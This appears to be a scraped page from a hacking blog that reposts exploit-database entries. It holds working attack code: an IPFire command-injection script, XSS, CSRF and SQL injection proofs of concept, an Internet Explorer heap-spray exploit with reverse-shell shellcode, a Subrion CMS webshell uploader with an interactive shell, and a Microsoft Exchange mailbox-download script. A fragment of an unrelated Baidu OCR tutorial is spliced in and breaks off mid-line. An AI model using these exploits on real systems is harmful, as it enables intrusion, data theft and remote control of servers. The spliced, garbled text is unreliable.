# Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated)
# Date: 15/05/2021
# Exploit Author: Mücahit Saratar
# Vendor Homepage: https://www.ipfire.org/
# Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso
# Version: 2.25 - core update 156
# Tested on: parrot os 5.7.0-2parrot2-amd64
# CVE: CVE-2021-33393
#!/usr/bin/python3
import requests as R
import sys
import base64
try:
host = sys.argv[1]
assert host[:4] == "http" and host[-1] != "/"
url = host + "/cgi-bin/pakfire.cgi"
username = sys.argv[2]
password = sys.argv[3]
komut = sys.argv[4]
except:
print(f"{sys.argv[0]} http://target.com:444 username password command")
exit(1)
veri = {
"INSPAKS": f"7zip;{komut}",
"ACTION":"install",
"x": "10",
"y": "6" }
token = b"Basic " + base64.b64encode(f"{username}:{password}".encode())
header = {"Authorization": token,
"Connection": "close",
"Cache-Control": "max-age=0",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
"Origin": host,
"Sec-GPC": "1",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-User": "?1",
"Sec-Fetch-Dest": "document",
"Referer": host}
R.post(url, data=veri, headers=header, verify=False)
print("Done.")
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863141540
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - 'Firstname' Persistent Cross Site Scripting (Authenticated)
# Date: 14-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Linux parrot
# --- Description --- #
# The web application allows member to inject persistent Cross-Site-Scripting payload which will be executed in both member and Admin panel
# --- Proof of concept --- #
1- Create account and login as member and go to: http://localhost/APR/edit_info.php
2- Inject this payload into Firstname input : <script>alert(document.cookie)</script>
4- and fill other inputs as you want (Other inputs might be vulnerable as well) then click on Update button.
5- refresh the page and Xss popup will be triggered.
6- Now if Admin visit this page in his/her Dashboard : http://localhost/APR/admin/members.php
7- Our Xss payload will be executed on Admin Browser
** Attacker can use this vulnerability to take over Admin account **
# Exploit Title: Simple Chatbot Application 1.0 - 'Category' Stored Cross site Scripting
# Date: 16-05-2021
# Exploit Author: Vani K G
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html
# Version: 1.0
# Tested on: Windows 10/XAMPP
Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the
two. It occurs when a malicious script is injected directly into a
vulnerable web application.
Attack Vector :
This vulnerability can result in the attacker to inject the XSS
payload in the Title field of the page and each time any user will
open the website, the XSS triggers and attacker can able to steal the
cookie according to the crafted payload.
Vulnerable Parameters: Settings System Info field
Payload : <script>alert(1)</script>
Vulnerable URL :
http://localhost/chatbot/admin/?page=system_info
Steps To Reproduce :
1) Go to the admin Dashboard
2) Click on Settings and Select System Info.
3) Put Payload into the System name input field.
4) Click on Save.
5) XSS payload will be triggered.
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Cross Site Request Forgery (Add Admin)
# Date: 15-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: PHP 7.4.11 , Linux x64_x86
# --- Proof of concept --- #
# Vulnerable file : http://localhost/APR/admin/user.php
# Exploit:
<html>
<head>
<title>Add Admin</title>
</head>
<body>
<h1> Absolutely Not Vulnerable Site :D </h1>
<form method="POST" action="http://127.0.0.1/APR/admin/user.php">
<input type="hidden" name="username" value="lol">
<input type="hidden" name="password" value="321" >
<button type="submit" name="submit">Click</button>
</form>
</body>
</html>
# Exploit Title: Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free
# Date: 15/05/2021
# CVE : CVE-2013-3893
# PoC: https://github.com/travelworld/cve_2013_3893_trigger.html/blob/gh-pages/params.json
# Exploit Author: SlidingWindow
# Vendor Advisory: https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2013/2887505?redirectedfrom=MSDN
# Tested on: Microsoft Internet Explorer 8 (version: 8.0.7601.17514) on Windows 7 SP1 (Version 6.1 Build 7601 SP1)
# Bypasses: DEP, ASLR using MSVCR71.DLL
# Thanks to @corelanc0d3r for awesome Heap Exploitation Training and @offsectraining for OSCP training
<html>
<script>
var spraychunks = new Array();
// Use BSTR spray since DEPS spray didn't work here
function heapspray()
{
var ropchain = unescape("%u122c%u0c0c"); //EAX now points here. EDX = [EAX+0x70]. So call EDX will take a forward jump to stack-heap flip: 0x7c348b05 : # XCHG EAX,ESP # RETN
//ESP points here after stack-heap flip. jump over padding+stack-heap flip into ROP chain.
ropchain += unescape("%u6bd5%u7c36"); //0x7c366bd5 : # ADD ESP,100 # RETN ** [MSVCR71.dll] ** | {PAGE_EXECUTE_READ}
//Some padding
ropchain += unescape("%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565");
//ESP will point to 0x0c0c122c after stack-heap flip.
ropchain += unescape("%u8b05%u7c34"); //0x7c348b05 : # XCHG EAX,ESP # RETN ** [MSVCR71.dll] ** | {PAGE_EXECUTE_READ}
//More padding for ADD ESP, 100
ropchain += unescape("%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565");
//rop chain generated with mona.py - www.corelan.be
//ropchain needed a little fix
ropchain += unescape(
"" + // #[---INFO:gadgets_to_set_ebp:---] :
"%u1cab%u7c35" + // 0x7c351cab : ,# POP EBP # RETN [MSVCR71.dll]
"%u1cab%u7c35" + // 0x7c351cab : ,# skip 4 bytes [MSVCR71.dll]
"" + // #[---INFO:gadgets_to_set_ebx:---] :
"%u728e%u7c34" + // 0x7c34728e : ,# POP EAX # RETN [MSVCR71.dll]
"%ufdff%uffff" + // 0xfffffdff : ,# Value to negate, will become 0x00000201
"%u684b%u7c36" + // 0x7c36684b : ,# NEG EAX # RETN [MSVCR71.dll]
"%u1695%u7c37" + // 0x7c371695 : ,# POP EBX # RETN [MSVCR71.dll]
"%uffff%uffff" + // 0xffffffff : ,#
"%u5255%u7c34" + // 0x7c345255 : ,# INC EBX # FPATAN # RETN [MSVCR71.dll]
"%u2174%u7c35" + // 0x7c352174 : ,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [MSVCR71.dll]
"" + // #[---INFO:gadgets_to_set_edx:---] :
"%u5937%u7c34" + // 0x7c345937 : ,# POP EDX # RETN [MSVCR71.dll]
"%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040
"%u1eb1%u7c35" + // 0x7c351eb1 : ,# NEG EDX # RETN [MSVCR71.dll]
"" + // #[---INFO:gadgets_to_set_ecx:---] :
"%u0c81%u7c36" + // 0x7c360c81 : ,# POP ECX # RETN [MSVCR71.dll]
"%ucd8c%u7c38" + // 0x7c38cd8c : ,# &Writable location [MSVCR71.dll]
"" + // #[---INFO:gadgets_to_set_edi:---] :
"%u4648%u7c35" + // 0x7c354648 : ,# POP EDI # RETN [MSVCR71.dll]
"%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [MSVCR71.dll]
"" + // #[---INFO:gadgets_to_set_esi:---] :
"%u50dd%u7c36" + // 0x7c3650dd : ,# POP ESI # RETN [MSVCR71.dll]
"%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [MSVCR71.dll]
"%u5194%u7c34" + // 0x7c345194 : ,# POP EAX # RETN [MSVCR71.dll]
// "%ua140%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT MSVCR71.dll]
// "%ua051%u7c37" + // 7c37a051 + 0xEF should become 0x7c37a140, which is a pointer to &VirtualProtect()
// Because next instruction adds 0xEF into AL.
"%ua151%u7c37" + // 7c37a151 + + 0xEF should become 0x7c37a140, which is a pointer to &VirtualProtect()
// Because next instruction adds 0xEF into AL.
"" + // #[---INFO:pushad:---] :
"%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll]
"" + // #[---INFO:extras:---] :
"%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [MSVCR71.dll]
""); // :
// msfvenom -p windows/shell_reverse_tcp -a x86 lhost=192.168.154.130 lport=4444 -b '\x00' -f js_le
// First few bytes, %uc481%ufa24%uffff (which is \x81\xc4\x24\xfa\xff\xff # add esp,-1500) move ESP away from EIP to avoid GetPC() routine from corrupting our shellcode
var shellcode = unescape("%uc481%ufa24%uffff%uccd9%u74d9%uf424%ube5d%uba98%ue3da%uc931%u52b1%u7531%u8317%u04c5%ued03%u38a9%uf116%u3e26%u09d9%u5fb7%uec53%u5f86%u6507%u6fb8%u2b43%u1b35%udf01%u69ce%ud08e%uc767%udfe8%u7478%u7ec8%u87fb%ua01d%u47c2%ua150%ub503%uf399%ub1dc%ue30c%u8f69%u888c%u0122%u6d95%u20f2%u20b4%u7a88%uc316%uf75d%udb1f%u3282%u50e9%uc870%ub0e8%u3148%ufd46%uc064%u3a96%u3b42%u32ed%uc6b0%u81f6%u1cca%u1172%ud66c%ufd24%u3b8c%u76b2%uf082%ud0b0%u0787%u6b14%u8cb3%ubb9b%ud635%u1fbf%u8c1d%u06de%u63fb%u58de%udca4%u137a%u0849%u7ef7%ufd06%u803a%u69d6%uf34c%u36e4%u9be6%ube44%u5c20%u95aa%uf295%u1655%udbe6%u4291%u73b6%ueb33%u835d%u3ebc%ud3f1%u9112%u83b2%u41d2%uc95b%ubedc%uf27b%ud736%u0916%u18d1%u8b4e%uf1a3%uab8d%u5db2%u4d1b%u4dde%uc64d%uf777%u9cd4%uf8e6%ud9c2%u7229%u1ee1%u73e7%u0c8c%u7390%u6edb%u8b37%u06f1%u1edb%ud69e%u0292%u8109%uf5f3%u4740%uacee%u75fa%u29f3%u3dc4%u8a28%ubccb%ub6bd%uaeef%u367b%u9ab4%u61d3%u7462%udb92%u2ec4%ub74c%ua68e%ufb09%ub010%ud615%u5ce6%u8fa7%u63be%u5808%u1c37%uf874%uf7b8%u083c%u55f3%u8114%u0c5a%ucc24%ufb5c%ue96b%u09de%u0e14%u78fe%u4a11%u91b8%uc36b%u952d%ue4d8%u4167");
var junk = unescape("%u2020%u2020");
while (junk.length < 0x4000) junk += junk;
offset = 0x204/2 ; //0c0c1228
var junk_front = junk.substring(0,offset);
var junk_end = junk.substring(0,0x800 - junk_front.length - ropchain.length - shellcode.length)
var smallblock = junk_front + ropchain + shellcode + junk_end;
var largeblock = "";
while (largeblock.length < 0x80000) { largeblock = largeblock + smallblock; }
// make allocations
for (i = 0; i < 0x450; i++) { spraychunks[i] = largeblock.substring(0, (0x7fb00-6)/2); }
}
function alloc(nr_alloc){
for (var i=0; i < nr_alloc; i++){
divobj = document.createElement('div');
// Allocate 0x25 (37 decimal) bytes. Vulnerable object size = 0x4c bytes
divobj.className = "\u1228\u0c0c\u4141\u4141\u4242\u4242\u4343\u4343\u4444\u4444\u4545\u4545\u4646\u4646" +
"\u4747\u4747\u4848\u4949\u4949\u5050\u5050\u5151\u5151\u5252\u5252\u5353\u5353\u5454" +
"\u5454\u5555\u5555\u5656\u5656\u5757\u5757\u5858\u5858";
}
}
heapspray();
function trigger()
{
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
heapspray();
document.body.appendChild(id_0);
document.body.appendChild(id_1);
id_1.applyElement(id_0);
id_0.onlosecapture=function(e) {
//Vulnerable Object is freed here
document.write("");
//Replace/Reclaim the freed object here.
//Object size is 0x4c
alloc(0x20);
}
id_0['outerText']="";
id_0.setCapture();
id_1.setCapture();
}
window.onload = function() {
trigger();
}
</script>
</html>
<!-- Debug: Taking a different code path for this exploit
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000003 ebx=00000100 ecx=40404040 edx=00000001 esi=0089c098 edi=00000000
eip=7467b68d esp=0301c34c ebp=0301c360 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
mshtml!CElement::Doc:
7467b68d 8b01 mov eax,dword ptr [ecx] ds:002b:40404040=????????
0:005> u eip
mshtml!CElement::Doc:
7467b68d 8b01 mov eax,dword ptr [ecx]
7467b68f 8b5070 mov edx,dword ptr [eax+70h]
7467b692 ffd2 call edx
7467b694 8b400c mov eax,dword ptr [eax+0Ch]
7467b697 c3 ret
7467b698 90 nop
7467b699 90 nop
7467b69a 90 nop
0:005> ub eip
mshtml!CElement::SecurityContext+0x22:
7467b681 8b01 mov eax,dword ptr [ecx]
7467b683 8b5070 mov edx,dword ptr [eax+70h]
7467b686 ffe2 jmp edx
7467b688 90 nop
7467b689 90 nop
7467b68a 90 nop
7467b68b 90 nop
7467b68c 90 nop
To be honest, Pyhon is really awesome in data processing. Especially today with big data, we are inseparable from all kinds of data. This article introduces the use of Baidu OCR for text recognition.
Experimental Environment
Python (3.9.12) Kali Linux Baidu OCR
Apply for Baidu OCR
Visit Baidu Smart Cloud and activate API
Website: https://cloud.baidu.com/campaign/OCR202203/index.html 
You can log in with your Baidu account. The advantage of using Baidu login is that you can directly migrate Baidu's real-name authentication, so you don't need to wait a few more days for manual review.
You can choose to try it for free, or buy it for 10,000 times for 1 yuan. I think there is no difference, it is all enough.
When you receive the free credit, you must check the interface type, otherwise it will be blank.
Create a new application and get token
Click Create App in the Console-Text Recognition-Overview 
Select an individual for the application, and fill in the application name and overview at will 
After the creation is completed, enter the application list and you can see the API Key and Secret Key, and write it down.
Text Recognition
According to the official example, a simple column of Python was written. References are as follows:
from aip import AipOcr
APP_ID='
# Exploit Title: Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS)
# Date: 17/08/2021
# Exploit Author: Abdulkadir AYDOGAN
# Vendor Homepage: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook
# Software Link: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook
# Version: 2.4.4
Advanced Guestbook is a free open source guestbook script developed in PHP.
Examples of features include email notifications, uploading pictures, html
tags handling, multiple polls, comments and themes.
#Description
The following is PoC to use the XSS bug with authorized user.
Firstly there are four part of a emotion object which is :
- Emotion icon
- Emotion file name
- Emotion command which will be used to call this object (s_code)
- Emotion description (s_emotion)
Here is the exploitation steps for vulnerability:
1. Login to your admin account.
2. Go to "Smilies" tab to view and edit emotion icons
3. Click "edit" text in the "Action" column to edit emotions
4. Change emotion description to Javascript code
5. Click the "Submit Settings"
6. Click "Smilies" tab again to view all emotions and Javascript code will
be executed
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: s_emotion
# Attack Pattern: <script>alert("Smile more!")</script>
#PoC
HTTP Request:
POST /advancedguestbook/admin.php HTTP/1.1
Host: HOST_ADDRESS
Content-Length: 175
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://HOST_ADDRESS
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer:
http://HOST_ADDRESS/advancedguestbook/admin.php?action=smilies&session=17395de9919fffa0ac9476370c2c7ba0&uid=1&edit_smilie=7
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: _ga=GA1.2.2068746825.1621203842; _gid=GA1.2.1432458757.1621203842;
_gat=1
Connection: close
s_code=:cool:&s_emotion=<script>alert("Smile
more!")</script>&edit_smilie=7&uid=1&session=17395de9919fffa0ac9476370c2c7ba0&action=smilies&add_smilies=1
# Exploit Title: Billing Management System 2.0 - Union based SQL injection (Authenticated)
# Date: 2021-05-16
# Exploit Author: Mohammad Koochaki
# Vendor Homepage: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14380&title=Billing+Management+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 2.0
# This web application contains several SQL injection vulnerabilities in the following paths:
- http://localhost/editgroup.php?id=1
- http://localhost/edituser.php?id=1
- http://localhost/editcategory.php?id=10
- http://localhost/editproduct.php?id=1
- http://localhost/editsales.php?id=1
# PoC (editgroup.php):
- Vulnerable code:
$sql="SELECT * from user_groups where delete_status='0' and
id='".$_GET['id']." '";
- Payload:
http://localhost/editgroup.php?id=-1%27%20union%20select%201,group_concat(username,0x3a,password),3,4,5%20from%20users--+
# Exploit Title: EgavilanMedia PHPCRUD 1.0 - 'First Name' SQL Injection
# Date: 5/17/2021
# Exploit Author: Dimitrios Mitakos
# Vendor Homepage: https://egavilanmedia.com
# Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/
# Version: 1.0
# Tested on: Debian GNU/Linux 10
Vulnerable Parameter : firstname
1. Burp Suite -> Intercept is on
2. Go to the Website -> Add New Record
3. Back to Burp Suite -> Copy to file (r.txt)
POST /insert.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http:// <http://10.0.2.244/>x.x.x.x
Connection: close
Referer: http://x.x.x.x/index.php
Upgrade-Insecure-Requests: 1
firstname=x&lastname=y&address=z&skills=w&designation=a&insertData=
4. sqlmap -r r.txt --dump
# Exploit Title: Printable Staff ID Card Creator System 1.0 - SQLi & RCE via Arbitrary File Upload
# Date: 2021-05-16
# Exploit Author : bwnz
# Software Link: https://www.sourcecodester.com/php/12802/php-staff-id-card-creation-and-printing-system.html
# Version: 1.0
# Tested on: Ubuntu 20.04.2 LTS
# Printable Staff ID Card Creator System is vulnerable to an unauthenticated SQL Injection attack.
# After compromising the database via SQLi, an attacker can log in and leverage an arbitrary file upload
# vulnerability to obtain remote code execution.
-----SQL Injection-----
Step 1.) Navigate to the login page and populate the email and password fields.
Step 2.) With Burp Suite running, send and capture the request.
Step 3.) Within Burp Suite, right click and "Save item" in preparation for putting the request through SQLMap.
Step 4.) Open a terminal and run the following command:
sqlmap -r <saved item>
Below are the SQLMap results
Parameter: user_email (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: user_email=test@test.com' RLIKE (SELECT (CASE WHEN (9007=9007) THEN 0x7465737440746573742e636f6d ELSE 0x28 END))-- JaaE&password=`&login_button=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: user_email=test@test.com' AND (SELECT 7267 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(7267=7267,1))),0x7162716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pCej&password=`&login_button=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user_email=test@test.com' AND (SELECT 2884 FROM (SELECT(SLEEP(5)))KezZ)-- bBqz&password=`&login_button=
----- END -----
----- Authenticated RCE via Arbitrary File Upload -----
# For this attack, it is assumed that you've obtained credentials via the SQL Injection attack above and have logged in.
Step 1.) After logging in, click the "Initialization" option and "Add System Info".
Step 2.) Populate the blank form with arbitrary data. At the bottom of the form, there is an option to upload a logo. Upload your evil.php file here and click "Finish".
Step 3.) By default, the file is uploaded to http://<IP>/Staff_registration/media/evil.php. Navigate to it for RCE.
----- END ------
# Exploit Title: Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated)
# Date: 17/05/2021
# Exploit Author: Fellipe Oliveira
# Vendor Homepage: https://subrion.org/
# Software Link: https://github.com/intelliants/subrion
# Version: SubrionCMS 4.2.1
# Tested on: Debian9, Debian 10 and Ubuntu 16.04
# CVE: CVE-2018-19422
# Exploit Requirements: BeautifulSoup library
# https://github.com/intelliants/subrion/issues/801
#!/usr/bin/python3
import requests
import time
import optparse
import random
import string
from bs4 import BeautifulSoup
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri http://target/panel")
parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")
parser.add_option('-p', '--passw', action="store", dest="passw", help="Password credential to login")
options, args = parser.parse_args()
if not options.url:
print('[+] Specify an url target')
print('[+] Example usage: exploit.py -u http://target-uri/panel')
print('[+] Example help usage: exploit.py -h')
exit()
url_login = options.url
url_upload = options.url + 'uploads/read.json'
url_shell = options.url + 'uploads/'
username = options.user
password = options.passw
session = requests.Session()
def login():
global csrfToken
print('[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 \n')
print('[+] Trying to connect to: ' + url_login)
try:
get_token_request = session.get(url_login)
soup = BeautifulSoup(get_token_request.text, 'html.parser')
csrfToken = soup.find('input',attrs = {'name':'__st'})['value']
print('[+] Success!')
time.sleep(1)
if csrfToken:
print(f"[+] Got CSRF token: {csrfToken}")
print("[+] Trying to log in...")
auth_url = url_login
auth_cookies = {"loader": "loaded"}
auth_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/", "Upgrade-Insecure-Requests": "1"}
auth_data = {"__st": csrfToken, "username": username, "password": password}
auth = session.post(auth_url, headers=auth_headers, cookies=auth_cookies, data=auth_data)
if len(auth.text) <= 7000:
print('\n[x] Login failed... Check credentials')
exit()
else:
print('[+] Login Successful!\n')
else:
print('[x] Failed to got CSRF token')
exit()
except requests.exceptions.ConnectionError as err:
print('\n[x] Failed to Connect in: '+url_login+' ')
print('[x] This host seems to be Down')
exit()
return csrfToken
def name_rnd():
global shell_name
print('[+] Generating random name for Webshell...')
shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15)))
time.sleep(1)
print('[+] Generated webshell name: '+shell_name+'\n')
return shell_name
def shell_upload():
print('[+] Trying to Upload Webshell..')
try:
up_url = url_upload
up_cookies = {"INTELLI_06c8042c3d": "15ajqmku31n5e893djc8k8g7a0", "loader": "loaded"}
up_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6159367931540763043609390275", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/uploads/"}
up_data = "-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n17978446266285\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"__st\"\r\n\r\n"+csrfToken+"\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\""+shell_name+".phar\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n1621210391\r\n-----------------------------6159367931540763043609390275--\r\n"
session.post(up_url, headers=up_headers, cookies=up_cookies, data=up_data)
except requests.exceptions.HTTPError as conn:
print('[x] Failed to Upload Webshell in: '+url_upload+' ')
exit()
def code_exec():
try:
url_clean = url_shell.replace('/panel', '')
req = session.get(url_clean + shell_name + '.phar?cmd=id')
if req.status_code == 200:
print('[+] Upload Success... Webshell path: ' + url_shell + shell_name + '.phar \n')
while True:
cmd = input('$ ')
x = session.get(url_clean + shell_name + '.phar?cmd='+cmd+'')
print(x.text)
else:
print('\n[x] Webshell not found... upload seems to have failed')
except:
print('\n[x] Failed to execute PHP code...')
login()
name_rnd()
shell_upload()
code_exec()
# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download
# Date: 03-11-2021
# Exploit Author: Gonzalo Villegas a.k.a Cl34r
# Vendor Homepage: https://www.microsoft.com/
# Version: OWA Exchange 2013 - 2019
# Tested on: OWA 2016
# CVE : CVE-2021-26855
# Details: checking users mailboxes and automated downloads of emails
import requests
import argparse
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
__proxies__ = {"http": "http://127.0.0.1:8080",
"https": "https://127.0.0.1:8080"} # for debug on proxy
# needs to specifies mailbox, will return folder Id if account exists
payload_get_folder_id = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<m:GetFolder>
<m:FolderShape>
<t:BaseShape>AllProperties</t:BaseShape>
</m:FolderShape>
<m:FolderIds>
<t:DistinguishedFolderId Id="inbox">
<t:Mailbox>
<t:EmailAddress>{}</t:EmailAddress>
</t:Mailbox>
</t:DistinguishedFolderId>
</m:FolderIds>
</m:GetFolder>
</soap:Body>
</soap:Envelope>
"""
# needs to specifies Folder Id and ChangeKey, will return a list of messages Ids (emails)
payload_get_items_id_folder = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<m:FindItem Traversal="Shallow">
<m:ItemShape>
<BaseShape>AllProperties</BaseShape></m:ItemShape>
<SortOrder/>
<m:ParentFolderIds>
<t:FolderId Id="{}" ChangeKey="{}"/>
</m:ParentFolderIds>
<QueryString/>
</m:FindItem>
</soap:Body>
</soap:Envelope>
"""
# needs to specifies Id (message Id) and ChangeKey (of message too), will return an email from mailbox
payload_get_mail = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetItem xmlns="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" Traversal="Shallow">
<ItemShape>
<t:BaseShape>Default</t:BaseShape>
</ItemShape>
<ItemIds>
<t:ItemId Id="{}" ChangeKey="{}"/>
</ItemIds>
</GetItem>
</soap:Body>
</soap:Envelope>
"""
def getFQDN(url):
print("[*] Getting FQDN from headers")
rs = requests.post(url + "/owa/auth.owa", verify=False, data="evildata")
if "X-FEServer" in rs.headers:
return rs.headers["X-FEServer"]
else:
print("[-] Can't get FQDN ")
exit(0)
def extractEmail(url, uri, user, fqdn, content_folderid, path):
headers = {"Cookie": "X-BEResource={}/EWS/Exchange.asmx?a=~1942062522".format(fqdn),
"Content-Type": "text/xml",
"User-Agent": "Mozilla pwner"}
from xml.etree import ElementTree as ET
dom = ET.fromstring(content_folderid)
for p in dom.findall('.//{http://schemas.microsoft.com/exchange/services/2006/types}Folder'):
id_folder = p[0].attrib.get("Id")
change_key_folder = p[0].attrib.get("ChangeKey")
data = payload_get_items_id_folder.format(id_folder, change_key_folder)
